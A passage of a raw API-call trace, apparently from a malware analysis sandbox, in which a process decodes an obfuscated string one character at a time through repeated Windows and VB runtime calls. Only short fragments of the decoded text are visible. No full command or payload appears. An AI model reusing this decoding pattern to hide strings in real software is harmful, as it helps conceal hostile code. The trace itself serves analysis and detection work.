CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.545] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.546] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.546] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.546] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.547] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.547] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.548] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.548] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.548] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.549] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.549] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0084.550] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0084.550] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.551] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.551] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.552] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.553] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.553] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.553] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.554] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.554] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.555] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.555] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.556] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.556] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…", lpUsedDefaultChar=0x0) returned 1 [0084.557] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0084.557] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.558] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.558] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.558] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.559] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0084.559] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0084.560] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.560] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.560] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.561] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.561] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.562] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.562] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.563] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.563] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0084.564] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0084.564] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.565] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.565] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S", lpUsedDefaultChar=0x0) returned 1 [0084.566] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0084.566] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0084.567] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0084.567] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y", lpUsedDefaultChar=0x0) returned 1 [0084.567] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0084.568] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.569] VarSub (in: pvarLeft=0x28f66c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3eef4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.569] VarCat (in: pvarLeft=0x28f528, pvarRight=0x28f514, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="M", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M", lpUsedDefaultChar=0x0) returned 1 [0084.570] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="@", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="@") returned 1 [0084.570] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.571] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.571] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.571] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.572] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.572] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.572] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.573] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.573] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.574] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.574] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.574] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.575] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.575] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.575] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G", lpUsedDefaultChar=0x0) returned 1 [0084.576] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0084.576] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.577] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.577] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.578] VarSub (in: pvarLeft=0x28f67c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe3eedc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.578] VarCat (in: pvarLeft=0x28f478, pvarRight=0x28f67c, pvarResult=0x28f434 | out: 